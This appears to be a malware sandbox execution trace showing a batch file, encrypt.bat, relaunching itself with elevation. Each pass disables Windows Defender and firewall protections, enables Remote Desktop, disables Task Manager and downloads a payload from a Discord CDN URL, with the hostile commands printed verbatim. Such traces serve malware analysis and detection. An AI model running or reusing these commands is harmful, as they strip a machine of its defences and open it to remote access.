C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"58⤵PID:4296
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable58⤵PID:1616
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE58⤵PID:3052
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off58⤵PID:1388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off58⤵PID:3796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off58⤵PID:4424
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off58⤵PID:4108
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off58⤵PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"58⤵PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"58⤵PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"58⤵PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"58⤵PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"58⤵PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"58⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"58⤵
- Blocklisted process makes network request
PID:924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"58⤵
- Command and Scripting Interpreter: PowerShell
PID:2336 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"59⤵PID:3052
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"60⤵PID:1564
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f60⤵PID:1360
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"60⤵PID:1140
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f60⤵PID:700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"60⤵PID:1560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"60⤵PID:4044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"60⤵PID:2520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"60⤵PID:1040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"60⤵PID:2612
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable60⤵PID:3624
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE60⤵PID:2812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off60⤵PID:1300
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off60⤵PID:2764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off60⤵
- Modifies Windows Firewall
PID:4816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off60⤵PID:4516
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off60⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"60⤵PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"60⤵PID:3516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"60⤵PID:1804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"60⤵PID:4940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"60⤵PID:2392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"60⤵PID:3544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"60⤵
- Blocklisted process makes network request
PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"60⤵
- Command and Scripting Interpreter: PowerShell
PID:2436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"61⤵PID:3624
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"62⤵PID:2344
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f62⤵PID:3128
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"62⤵PID:1140
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f62⤵PID:3504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"62⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"62⤵PID:168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"62⤵PID:4740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"62⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"62⤵PID:3052
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable62⤵PID:3588
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE62⤵PID:2820
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off62⤵PID:3064
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off62⤵PID:1948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off62⤵PID:5008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off62⤵PID:1660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off62⤵PID:4324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"62⤵PID:4708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"62⤵PID:5096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"62⤵PID:2344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"62⤵PID:2820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"62⤵PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"62⤵PID:1428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"62⤵
- Blocklisted process makes network request
PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"62⤵PID:3028
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"63⤵PID:4296
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"64⤵PID:168
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f64⤵PID:2960
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"64⤵PID:744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f64⤵PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"64⤵PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"64⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"64⤵PID:4392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"64⤵PID:4592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"64⤵PID:3028
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable64⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE64⤵PID:2436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off64⤵PID:1948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off64⤵PID:2264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off64⤵PID:2520
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off64⤵PID:1896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off64⤵PID:4656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"64⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"64⤵PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"64⤵PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"64⤵PID:4680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"64⤵PID:4044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"64⤵PID:2188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"64⤵
- Blocklisted process makes network request
PID:4240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"64⤵
- Command and Scripting Interpreter: PowerShell
PID:2120 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"65⤵PID:824
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"66⤵PID:1148
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f66⤵PID:360
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"66⤵PID:2988
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f66⤵PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"66⤵PID:1152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"66⤵PID:1888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"66⤵PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"66⤵PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"66⤵PID:2120
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable66⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE66⤵PID:3716
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off66⤵PID:1436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off66⤵PID:648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off66⤵PID:4412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off66⤵PID:4664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off66⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"66⤵PID:1916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"66⤵PID:1348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"66⤵PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"66⤵PID:4680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"66⤵PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"66⤵PID:4280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"66⤵
- Blocklisted process makes network request
PID:608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"66⤵PID:1944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"67⤵PID:1876
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"68⤵PID:4760
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f68⤵PID:3516
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"68⤵PID:4568
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f68⤵PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"68⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"68⤵PID:4328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"68⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"68⤵PID:3860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"68⤵PID:3068
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable68⤵PID:1504
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE68⤵PID:1888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off68⤵PID:4920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off68⤵PID:1120
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off68⤵PID:1692
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off68⤵
- Modifies Windows Firewall
PID:1712
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off68⤵
- Modifies Windows Firewall
PID:1760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"68⤵PID:3080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"68⤵PID:2392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"68⤵PID:360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"68⤵PID:1152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"68⤵PID:3592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"68⤵PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"68⤵
- Blocklisted process makes network request
PID:3588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"68⤵
- Command and Scripting Interpreter: PowerShell
PID:2936 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"69⤵PID:360
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"70⤵PID:368
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f70⤵PID:4548
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"70⤵PID:4216
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f70⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"70⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"70⤵PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"70⤵PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"70⤵PID:2448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"70⤵PID:3560
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable70⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE70⤵PID:1300
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off70⤵PID:1660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off70⤵PID:488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off70⤵PID:4328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off70⤵PID:1872
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off70⤵PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"70⤵PID:3080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"70⤵PID:3708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"70⤵PID:744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"70⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"70⤵PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"70⤵PID:2900
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"70⤵
- Blocklisted process makes network request
PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"70⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4760 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"71⤵PID:3520
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV172⤵PID:744
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"72⤵PID:4288
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f72⤵PID:3016
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"72⤵PID:2708
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f72⤵PID:1088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:3440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:3580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:1804
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable72⤵
- Modifies Windows Firewall
PID:1140
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE72⤵PID:1652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off72⤵PID:4048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off72⤵PID:164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off72⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off72⤵PID:3144
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off72⤵PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"72⤵PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"72⤵PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"72⤵PID:4088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"72⤵PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"72⤵PID:1360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"72⤵PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"72⤵
- Blocklisted process makes network request
PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"72⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:2216 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"73⤵PID:2760
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"74⤵PID:440
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f74⤵PID:3516
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"74⤵PID:2344
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f74⤵PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"74⤵PID:1504
-
-
